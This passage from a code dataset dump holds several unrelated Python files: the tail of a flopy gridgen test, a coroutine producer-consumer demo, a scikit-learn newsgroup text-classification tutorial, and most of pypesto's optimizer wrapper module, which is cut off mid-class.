msg\n\n # test the gridgen line intersection\n line = [[[(Lx, Ly), (Lx, 0.)]]]\n cells = g.intersect(line, 'line', 0)\n nlist = [n for n in cells['nodenumber']]\n nlist2 = [19, 650, 39, 630, 59, 610, 79, 590, 99, 570, 119, 550, 139,\n 530, 159, 510, 194, 490, 265, 455, 384]\n msg = ('gridgen line intersect did not identify the correct '\n 'cells {} <> {}'.format(nlist, nlist2))\n assert nlist == nlist2, msg\n\n # test getting a modflow-usg disu package\n mu = flopy.modflow.Modflow(version='mfusg', structured=False)\n disu = g.get_disu(mu)\n\n # test writing a modflow 6 disu package\n fname = os.path.join(cpth, 'mymf6model.disu')\n g6.to_disu6(fname)\n assert os.path.isfile(fname), \\\n 'MF6 disu file not created: {}'.format(fname)\n\n # test writing a modflow 6 disv package\n fname = os.path.join(cpth, 'mymf6model.disv')\n g6.to_disv6(fname)\n assert os.path.isfile(fname), \\\n 'MF6 disv file not created: {}'.format(fname)\n\n return\n\n\nif __name__ == '__main__':\n test_gridgen()\n","repo_name":"tikiri/Jayantha-Obeysekera","sub_path":"autotest/t061_test_gridgen.py","file_name":"t061_test_gridgen.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23646496931","text":"# Concept: two or more functions switch calls back and forth; in essence only one function is executing at a time, the program itself controls the coroutines, and coroutines are opened on top of a thread\n# Advantages: achieves a concurrency effect within a single thread, makes maximum use of the cpu, low cost, good extensibility\n# 
Drawbacks: cannot use multi-core resources; coroutines must cooperate with processes to run on multiple cpus, and a blocking operation will block the whole program\n\ndef service():\n while True:\n o = yield\n print('Produced cup of milk tea no. {}.....'.format(o))\n\n\n\ndef client():\n g = service()\n next(g)\n for i in range(10):\n g.send(i)\n print(\"Consumed cup of milk tea no. {},,,,\".format(i))\n\n\nif __name__ == \"__main__\":\n client()","repo_name":"xiaotiankeyi/PythonBase","sub_path":"python_processThreading/asynico_oo/coroutines_yield.py","file_name":"coroutines_yield.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19733023060","text":"\"\"\"\nThis module contains code explained\nin the \"Working With Text Data\" scikit-learn tutorial\nhttps://scikit-learn.org/stable/tutorial/text_analytics/working_with_text_data.html\nusing the \"Twenty Newsgroups\" dataset.\n\"\"\"\n\nfrom sklearn.datasets import fetch_20newsgroups\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn import metrics\n\nfrom sklearn.model_selection import GridSearchCV\n\nimport numpy as np\n\ncategories = [\n 'alt.atheism',\n 'soc.religion.christian',\n 'comp.graphics',\n 'sci.med'\n]\n\n\n# --- load text data\ntwenty_train, twenty_test = [\n fetch_20newsgroups(subset=subset, categories=categories,\n shuffle=True, random_state=42)\n for subset in ['train', 'test']\n]\n\ntrain_data = twenty_train.data\ntrain_target = twenty_train.target\ntrain_target_names = twenty_train.target_names\n\ntest_data = twenty_test.data\ntest_target = twenty_test.target\ntest_target_names = twenty_test.target_names\n\n\n# --- build fq data from text\ncount_vect_t = CountVectorizer()\ncount_vect_t.fit(train_data)\ntrain_data_count_vect = count_vect_t.transform(train_data)\n\n\n# --- transform fq to TF-IDF\ntfidf_t = TfidfTransformer(use_idf=False) # can be True XXX\ntfidf_t.fit(train_data_count_vect)\ntrain_data_tfidf = tfidf_t.transform(train_data_count_vect)\n\n\n# --- train a MultinomialNB classifier -- an estimator (\"_e\")\nmultinb_e = MultinomialNB()\nmultinb_e.fit(train_data_tfidf, train_target)\n\n\n# --- predict values for new data -- just 2 documents\ntest_mini = ['God is love', 'OpenGL on the GPU is fast']\ntest_mini_count_vect = count_vect_t.transform(test_mini)\ntest_mini_tfidf = tfidf_t.transform(test_mini_count_vect)\n\npredicted = multinb_e.predict(test_mini_tfidf)\n\nfor doc, category in zip(test_mini, predicted):\n print('%r => %s' % (doc, train_target_names[category]))\n\n\n# --- same as the above, together as a Pipeline\ntext_clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', MultinomialNB()),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = text_clf.predict(test_data)\nprint('MultinomialNB', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n\n# --- can we do better using an SVM?\ntext_clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', SGDClassifier(loss='hinge', penalty='l2',\n alpha=1e-3, random_state=42,\n max_iter=5, tol=None)),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = 
text_clf.predict(test_data)\nprint('SGDClassifier', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n\n# --- parameter tuning using grid search\nparameters = {\n 'vect__ngram_range': [(1, 1), (1, 2)],\n 'tfidf__use_idf': (True, False),\n 'clf__alpha': (1e-1, 1e-2, 1e-3, 1e-4),\n}\n\ngs_clf = GridSearchCV(text_clf, parameters, cv=5, n_jobs=-1)\ngs_clf = gs_clf.fit(train_data, train_target)\n\nprint('GridSearchCV', gs_clf.best_score_)\nprint(gs_clf.best_params_)\n\n\n# --- take a look at the best parameter setting provided by GridSearchCV\n# XXX hmm, why doesn't this give the same result\n# XXX as gs_clf.best_score_ ???\n# => I would have strongly expected it to! :)\ntext_clf = Pipeline([\n ('vect', CountVectorizer(\n ngram_range=gs_clf.best_params_['vect__ngram_range'])),\n ('tfidf', TfidfTransformer(\n use_idf=gs_clf.best_params_['tfidf__use_idf'])),\n ('clf', SGDClassifier(\n loss='hinge',\n penalty='l2',\n alpha=gs_clf.best_params_['clf__alpha'],\n random_state=42,\n max_iter=5,\n tol=None\n )),\n])\ntext_clf.fit(train_data, train_target)\n\n\n# --- evaluation\npredicted = text_clf.predict(test_data)\nprint('SGDClassifier/best', np.mean(predicted == test_target))\n\n\n# --- detailed performance analysis\nprint(metrics.classification_report(test_target, predicted,\n target_names=test_target_names))\nprint(metrics.confusion_matrix(test_target, predicted))\n\n","repo_name":"sassbalint/ml","sub_path":"tut/sklearn_tut.py","file_name":"sklearn_tut.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10410104511","text":"from __future__ import annotations\n\nimport abc\nimport logging\nimport re\nimport time\nimport warnings\nfrom typing import TYPE_CHECKING, Dict, Optional\n\nimport numpy as np\nimport scipy.optimize\n\nfrom ..C import FVAL, GRAD, INNER_PARAMETERS, MODE_FUN, MODE_RES\nfrom ..history import (\n HistoryOptions,\n NoHistory,\n OptimizerHistory,\n create_history,\n)\nfrom ..objective import Objective\nfrom ..problem import Problem\nfrom ..result import OptimizerResult\nfrom .load import fill_result_from_history\nfrom .options import OptimizeOptions\nfrom .util import check_finite_bounds\n\nif TYPE_CHECKING:\n import fides\n\nlogger = logging.getLogger(__name__)\n\n\nclass OptimizerImportError(ImportError):\n \"\"\"Exception raised when an optimizer is not available.\"\"\"\n\n def __init__(self, optimizer: str):\n super().__init__(\n f'Optimizer \"{optimizer}\" not available, install corresponding '\n f'package e.g. 
via \"pip install pypesto[{optimizer}]\"'\n )\n\n\ndef history_decorator(minimize):\n \"\"\"Initialize and extract information stored in the history.\n\n Default decorator for the minimize() method.\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n if history_options is None:\n history_options = HistoryOptions()\n\n objective = problem.objective\n\n # initialize the objective\n objective.initialize()\n\n # initialize the history\n history = create_history(\n id=id,\n x_names=[problem.x_names[ix] for ix in problem.x_free_indices],\n options=history_options,\n )\n optimizer_history = OptimizerHistory(\n history=history,\n x0=x0,\n lb=problem.lb,\n ub=problem.ub,\n )\n\n # plug in history for the objective to record it\n objective.history = optimizer_history\n\n # perform the actual minimization\n try:\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n result.id = id\n objective.history.finalize(\n message=result.message, exitflag=result.exitflag\n )\n except Exception as err:\n if optimize_options.allow_failed_starts:\n logger.error(f'start {id} failed: {err}')\n result = OptimizerResult(\n x0=x0, exitflag=-1, message=str(err), id=id\n )\n else:\n raise\n\n # maybe override results from history depending on options\n result = fill_result_from_history(\n result=result,\n optimizer_history=objective.history,\n optimize_options=optimize_options,\n )\n\n # clean up, history is available from result\n objective.history = NoHistory()\n\n return result\n\n return wrapped_minimize\n\n\ndef time_decorator(minimize):\n \"\"\"Measure time of optimization.\n\n Default decorator for the minimize() method to take time.\n Currently, the method time.time() is used, which measures\n the wall-clock time.\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n start_time = time.time()\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n used_time = time.time() - start_time\n result.time = used_time\n return result\n\n return wrapped_minimize\n\n\ndef fix_decorator(minimize):\n \"\"\"Include also fixed parameters in the result arrays of minimize().\n\n Default decorator for the minimize() method (nans will be inserted in the\n derivatives).\n \"\"\"\n\n def wrapped_minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ):\n # perform the actual optimization\n result = minimize(\n self,\n problem=problem,\n x0=x0,\n id=id,\n history_options=history_options,\n optimize_options=optimize_options,\n )\n\n # vectors to full vectors\n result.update_to_full(problem)\n\n logger.debug(\n f\"Final fval={result.fval:.4f}, time={result.time:.4f}s, \"\n f\"n_fval={result.n_fval}.\",\n )\n\n return result\n\n return wrapped_minimize\n\n\nclass Optimizer(abc.ABC):\n \"\"\"\n Optimizer base class, not functional on its own.\n\n An optimizer takes a problem, and possibly a start point, and then\n performs an optimization. 
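A typical call, as a minimal sketch (assumes a configured pypesto\n Problem; the concrete subclass and settings are illustrative)::\n\n optimizer = ScipyOptimizer(method='L-BFGS-B')\n result = optimizer.minimize(problem=problem, x0=x0, id='0')\n\n 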
It returns an OptimizerResult.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize base class.\"\"\"\n\n @abc.abstractmethod\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"\n Perform optimization.\n\n Parameters\n ----------\n problem:\n The problem to find optimal parameters for.\n x0:\n The starting parameters.\n id:\n Multistart id.\n history_options:\n Optimizer history options.\n optimize_options:\n Global optimization options.\n \"\"\"\n\n @abc.abstractmethod\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n return None\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0, return boolean.\"\"\"\n return True\n\n\nclass ScipyOptimizer(Optimizer):\n \"\"\"\n Use the SciPy optimizers.\n\n Find details on the optimizer and configuration options at:\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.\\\n optimize.minimize.html#scipy.optimize.minimize\n \"\"\"\n\n def __init__(\n self,\n method: str = 'L-BFGS-B',\n tol: float = None,\n options: Dict = None,\n ):\n super().__init__()\n\n self.method = method\n\n self.options = options\n if self.options is None:\n self.options = ScipyOptimizer.get_default_options(self)\n self.tol = tol\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} method={self.method}\"\n # print everything that is customized\n if self.tol is not None:\n rep += f\" tol={self.tol}\"\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
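For example (illustrative settings; a method name starting with\n 'ls_' would dispatch to scipy.optimize.least_squares instead)::\n\n optimizer = ScipyOptimizer(method='TNC', tol=1e-9)\n\n 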
Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n objective = problem.objective\n\n if self.is_least_squares():\n # set tolerance to default of scipy optimizer\n tol = self.tol\n if tol is None:\n tol = 1e-8\n # is a residual based least squares method\n if not objective.has_res:\n raise Exception(\n \"For least squares optimization, the objective \"\n \"must be able to compute residuals.\"\n )\n\n ls_method = self.method[3:]\n bounds = (lb, ub)\n\n fun = objective.get_res\n jac = objective.get_sres if objective.has_sres else '2-point'\n # TODO: pass jac computing methods in options\n\n if self.options is not None:\n ls_options = self.options.copy()\n ls_options['verbose'] = (\n 2\n if 'disp' in ls_options.keys() and ls_options['disp']\n else 0\n )\n ls_options.pop('disp', None)\n ls_options['max_nfev'] = ls_options.pop('maxfun', None)\n else:\n ls_options = {}\n\n # optimize\n res = scipy.optimize.least_squares(\n fun=fun,\n x0=x0,\n method=ls_method,\n jac=jac,\n bounds=bounds,\n tr_solver=ls_options.pop(\n 'tr_solver', 'lsmr' if len(x0) > 1 else 'exact'\n ),\n loss='linear',\n ftol=tol,\n **ls_options,\n )\n # extract fval/grad from result, note that fval is not available\n # from least squares solvers\n grad = getattr(res, 'grad', None)\n fval = None\n else:\n # is an fval based optimization method\n\n if not objective.has_fun:\n raise Exception(\n \"For this optimizer, the objective must \"\n \"be able to compute function values\"\n )\n\n bounds = scipy.optimize.Bounds(lb, ub)\n\n # fun_may_return_tuple = self.method.lower() in \\\n # ['cg', 'bfgs', 'newton-cg', 'l-bfgs-b', 'tnc', 'slsqp',\n # 'dogleg', 'trust-ncg']\n # TODO: is it more efficient to have tuple as output of fun?\n method_supports_grad = self.method.lower() in [\n 'cg',\n 'bfgs',\n 'newton-cg',\n 'l-bfgs-b',\n 'tnc',\n 'slsqp',\n 'dogleg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-exact',\n 'trust-constr',\n ]\n method_supports_hess = self.method.lower() in [\n 'newton-cg',\n 'dogleg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-exact',\n 'trust-constr',\n ]\n method_supports_hessp = self.method.lower() in [\n 'newton-cg',\n 'trust-ncg',\n 'trust-krylov',\n 'trust-constr',\n ]\n # switch off passing over functions if not applicable (e.g.\n # NegLogParameterPrior) since grad/hess attributes do not exist\n if not isinstance(objective, Objective):\n if not hasattr(objective, 'grad'):\n objective.grad = False\n if not hasattr(objective, 'hess'):\n objective.hess = False\n # TODO: resolve warning by implementing saving of hess temporarily\n # in objective and pass to scipy separately\n if objective.hess is True:\n warnings.warn(\n \"scipy.optimize.minimize does not support \"\n \"passing fun and hess as one function. Hence \"\n \"for each evaluation of hess, fun will be \"\n \"evaluated again. This can lead to increased \"\n \"computation times. 
If possible, separate fun \"\n \"and hess.\"\n )\n if objective.grad is True:\n\n def fun(x):\n return objective(x, sensi_orders=(0, 1))\n\n else:\n fun = objective.get_fval\n jac = (\n objective.get_grad\n if objective.has_grad\n and method_supports_grad\n and objective.grad is not True\n else (True if objective.grad is True else None)\n )\n hess = (\n objective.get_hess\n if objective.has_hess and method_supports_hess\n else None\n )\n hessp = (\n objective.get_hessp\n if objective.has_hessp and method_supports_hessp\n else None\n )\n # minimize will ignore hessp otherwise\n if hessp is not None:\n hess = None\n\n # optimize\n res = scipy.optimize.minimize(\n fun=fun,\n x0=x0,\n method=self.method,\n jac=jac,\n hess=hess,\n hessp=hessp,\n bounds=bounds,\n options=self.options,\n tol=self.tol,\n )\n # extract fval/grad from result\n grad = getattr(res, 'jac', None)\n fval = res.fun\n\n # fill in everything known, although some parts will be overwritten\n optimizer_result = OptimizerResult(\n x=np.array(res.x),\n fval=fval,\n grad=grad,\n hess=getattr(res, 'hess', None),\n exitflag=res.status,\n message=res.message,\n )\n if hasattr(objective, INNER_PARAMETERS) and objective.inner_parameters:\n optimizer_result[INNER_PARAMETERS] = objective.inner_parameters\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return re.match(r'(?i)^(ls_)', self.method)\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n if self.is_least_squares():\n options = {'max_nfev': 1000, 'disp': False}\n else:\n options = {'maxfun': 1000, 'disp': False}\n return options\n\n\nclass IpoptOptimizer(Optimizer):\n \"\"\"Use IpOpt (https://pypi.org/project/ipopt/) for optimization.\"\"\"\n\n def __init__(self, options: Dict = None):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n options:\n Options are directly passed on to `cyipopt.minimize_ipopt`.\n \"\"\"\n super().__init__()\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
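For example (the option name follows Ipopt's naming and is\n illustrative only)::\n\n optimizer = IpoptOptimizer(options={'max_iter': 200})\n\n 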
Parameters: see `Optimizer` documentation.\"\"\"\n try:\n import cyipopt\n except ImportError:\n raise OptimizerImportError(\"ipopt\")\n\n objective = problem.objective\n\n bounds = np.array([problem.lb, problem.ub]).T\n\n ret = cyipopt.minimize_ipopt(\n fun=objective.get_fval,\n x0=x0,\n method=None, # ipopt does not use this argument for anything\n jac=objective.get_grad,\n hess=None, # ipopt does not support Hessian yet\n hessp=None, # ipopt does not support Hessian vector product yet\n bounds=bounds,\n tol=None, # can be set via options\n options=self.options,\n )\n\n # the ipopt return object is a scipy.optimize.OptimizeResult\n return OptimizerResult(\n x=ret.x, exitflag=ret.status, message=ret.message\n )\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass DlibOptimizer(Optimizer):\n \"\"\"Use the Dlib toolbox for optimization.\"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n self.options = options\n if self.options is None:\n self.options = DlibOptimizer.get_default_options(self)\n elif 'maxiter' not in self.options:\n raise KeyError('Dlib options are missing the keyword ' 'maxiter.')\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n check_finite_bounds(lb, ub)\n objective = problem.objective\n\n try:\n import dlib\n except ImportError:\n raise OptimizerImportError(\"dlib\")\n\n if not objective.has_fun:\n raise ValueError(\n \"For this optimizer, the objective must \"\n \"be able to return function values.\"\n )\n\n # dlib requires variable length arguments\n def get_fval_vararg(*x):\n return objective.get_fval(x)\n\n dlib.find_min_global(\n get_fval_vararg,\n list(lb),\n list(ub),\n int(self.options['maxiter']),\n 0.002,\n )\n\n optimizer_result = OptimizerResult()\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def get_default_options(self):\n \"\"\"Create default options specific for the optimizer.\"\"\"\n return {'maxiter': 10000}\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warning(\"The Dlib optimizer does not support x0.\")\n return False\n\n\nclass PyswarmOptimizer(Optimizer):\n \"\"\"Global optimization using pyswarm.\"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n if options is None:\n options = {'maxiter': 200}\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
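For example (illustrative; the options dict is passed through\n to pyswarm.pso)::\n\n optimizer = PyswarmOptimizer(options={'maxiter': 200})\n\n 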
Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n try:\n import pyswarm\n except ImportError:\n raise OptimizerImportError(\"pyswarm\")\n\n check_finite_bounds(lb, ub)\n\n xopt, fopt = pyswarm.pso(\n problem.objective.get_fval, lb, ub, **self.options\n )\n\n optimizer_result = OptimizerResult(x=np.array(xopt), fval=fopt)\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warning(\"The pyswarm optimizer does not support x0.\")\n return False\n\n\nclass CmaesOptimizer(Optimizer):\n \"\"\"\n Global optimization using the covariance matrix adaptation evolution strategy (CMA-ES).\n\n This optimizer interfaces the cma package\n (https://github.com/CMA-ES/pycma).\n \"\"\"\n\n def __init__(self, par_sigma0: float = 0.25, options: Dict = None):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n par_sigma0:\n scalar, initial standard deviation in each coordinate.\n par_sigma0 should be about 1/4th of the search domain width\n (where the optimum is to be expected)\n options:\n Optimizer options that are directly passed on to cma.\n \"\"\"\n super().__init__()\n\n if options is None:\n options = {'maxiter': 10000}\n self.options = options\n self.par_sigma0 = par_sigma0\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} par_sigma0={self.par_sigma0}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
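For example (illustrative settings; see the class docstring for\n guidance on choosing par_sigma0)::\n\n optimizer = CmaesOptimizer(par_sigma0=0.25, options={'maxiter': 500})\n\n 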
Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n check_finite_bounds(lb, ub)\n\n sigma0 = self.par_sigma0 * np.median(ub - lb)\n self.options['bounds'] = [lb, ub]\n\n try:\n import cma\n except ImportError:\n raise OptimizerImportError(\"cma\")\n\n result = (\n cma.CMAEvolutionStrategy(\n x0,\n sigma0,\n inopts=self.options,\n )\n .optimize(problem.objective.get_fval)\n .result\n )\n\n optimizer_result = OptimizerResult(\n x=np.array(result[0]), fval=result[1]\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass ScipyDifferentialEvolutionOptimizer(Optimizer):\n \"\"\"\n Global optimization using scipy's differential evolution optimizer.\n\n Package homepage: https://docs.scipy.org/doc/scipy/reference/generated\\\n /scipy.optimize.differential_evolution.html\n\n Parameters\n ----------\n options:\n Optimizer options that are directly passed on to scipy's optimizer.\n\n\n Examples\n --------\n Arguments that can be passed to options:\n\n maxiter:\n used to calculate the maximal number of function evaluations by\n maxfevals = (maxiter + 1) * popsize * len(x)\n Default: 100\n popsize:\n population size, default value 15\n \"\"\"\n\n def __init__(self, options: Dict = None):\n super().__init__()\n\n if options is None:\n options = {'maxiter': 100}\n self.options = options\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
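For example (illustrative settings, passed straight to\n scipy.optimize.differential_evolution)::\n\n optimizer = ScipyDifferentialEvolutionOptimizer(\n options={'maxiter': 100, 'popsize': 15})\n\n 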
Parameters: see `Optimizer` documentation.\"\"\"\n bounds = list(zip(problem.lb, problem.ub))\n\n result = scipy.optimize.differential_evolution(\n problem.objective.get_fval, bounds, x0=x0, **self.options\n )\n\n optimizer_result = OptimizerResult(\n x=np.array(result.x), fval=result.fun\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n\nclass PyswarmsOptimizer(Optimizer):\n \"\"\"\n Global optimization using pyswarms.\n\n Package homepage: https://pyswarms.readthedocs.io/en/latest/index.html\n\n Parameters\n ----------\n par_popsize:\n number of particles in the swarm, default value 10\n\n options:\n Optimizer options that are directly passed on to pyswarms.\n c1: cognitive parameter\n c2: social parameter\n w: inertia parameter\n Default values are (c1,c2,w) = (0.5, 0.3, 0.9)\n\n Examples\n --------\n Arguments that can be passed to options:\n\n maxiter:\n used to calculate the maximal number of function evaluations.\n Default: 1000\n \"\"\"\n\n def __init__(self, par_popsize: float = 10, options: Dict = None):\n super().__init__()\n\n all_options = {'maxiter': 1000, 'c1': 0.5, 'c2': 0.3, 'w': 0.9}\n if options is None:\n options = {}\n all_options.update(options)\n self.options = all_options\n self.par_popsize = par_popsize\n\n def __repr__(self) -> str:\n rep = f\"<{self.__class__.__name__} par_popsize={self.par_popsize}\"\n # print everything that is customized\n if self.options is not None:\n rep += f\" options={self.options}\"\n return rep + \">\"\n\n @fix_decorator\n @time_decorator\n @history_decorator\n def minimize(\n self,\n problem: Problem,\n x0: np.ndarray,\n id: str,\n history_options: HistoryOptions = None,\n optimize_options: OptimizeOptions = None,\n ) -> OptimizerResult:\n \"\"\"Perform optimization. 
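For example (illustrative settings, mirroring the documented\n defaults)::\n\n optimizer = PyswarmsOptimizer(\n par_popsize=20, options={'c1': 0.5, 'c2': 0.3, 'w': 0.9})\n\n 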
Parameters: see `Optimizer` documentation.\"\"\"\n lb = problem.lb\n ub = problem.ub\n\n try:\n import pyswarms\n except ImportError:\n raise OptimizerImportError(\"pyswarms\")\n\n # check for finite values for the bounds\n if not np.isfinite(lb).all():\n raise ValueError(\n \"This optimizer can only handle finite lower bounds.\"\n )\n if not np.isfinite(ub).all():\n raise ValueError(\n \"This optimizer can only handle finite upper bounds.\"\n )\n\n optimizer = pyswarms.single.global_best.GlobalBestPSO(\n n_particles=self.par_popsize,\n dimensions=len(x0),\n options=self.options,\n bounds=(lb, ub),\n # init_pos=x0, # TODO: is a problem if x0 is not of the swarm size\n )\n\n def successively_working_fval(swarm: np.ndarray) -> np.ndarray:\n \"\"\"Evaluate the function for all parameters in the swarm object.\n\n Parameters\n ----------\n swarm: np.ndarray, shape (n_particles_in_swarm, n_parameters)\n\n Returns\n -------\n result: np.ndarray, shape (n_particles_in_swarm)\n \"\"\"\n n_particles = swarm.shape[0]\n result = np.zeros(n_particles)\n # iterate over the particles in the swarm\n for i_particle, par in enumerate(swarm):\n result[i_particle] = problem.objective.get_fval(par)\n\n return result\n\n cost, pos = optimizer.optimize(\n successively_working_fval,\n iters=self.options['maxiter'],\n verbose=False,\n )\n\n optimizer_result = OptimizerResult(\n x=pos,\n fval=float(cost),\n )\n\n return optimizer_result\n\n def is_least_squares(self):\n \"\"\"Check whether optimizer is a least squares optimizer.\"\"\"\n return False\n\n def check_x0_support(self, x_guesses: np.ndarray = None) -> bool:\n \"\"\"Check whether optimizer supports x0.\"\"\"\n if x_guesses is not None and x_guesses.size > 0:\n logger.warning(\"The pyswarms optimizer does not support x0.\")\n return False\n\n\nclass NLoptOptimizer(Optimizer):\n \"\"\"\n Global/Local optimization using NLopt.\n\n Package homepage: https://nlopt.readthedocs.io/en/latest/\n \"\"\"\n\n def __init__(\n self,\n method=None,\n local_method=None,\n options: Dict = None,\n local_options: Dict = None,\n ):\n \"\"\"\n Initialize.\n\n Parameters\n ----------\n method:\n Local or global Optimizer to use for minimization.\n local_method:\n Local method to use in combination with the global optimizer (\n for the MLSL family of solvers) or to solve a subproblem (for the\n AUGLAG family of solvers)\n options:\n Optimizer options. scipy option `maxiter` is automatically\n transformed into `maxeval` and takes precedence.\n local_options:\n Optimizer options for the local method\n \"\"\"\n super().__init__()\n\n if options is None:\n options = {}\n elif 'maxiter' in options:\n options['maxeval'] = options.pop('maxiter')\n if local_options is None:\n local_options = {}\n self.options = options\n self.local_options = local_options\n\n try:\n import nlopt\n except ImportError:\n raise OptimizerImportError(\"nlopt\")\n\n if method is None:\n method = nlopt.LD_LBFGS\n\n needs_local_method = [\n nlopt.G_MLSL,\n nlopt.G_MLSL_LDS,\n nlopt.GD_MLSL,\n nlopt.GD_MLSL_LDS,\n 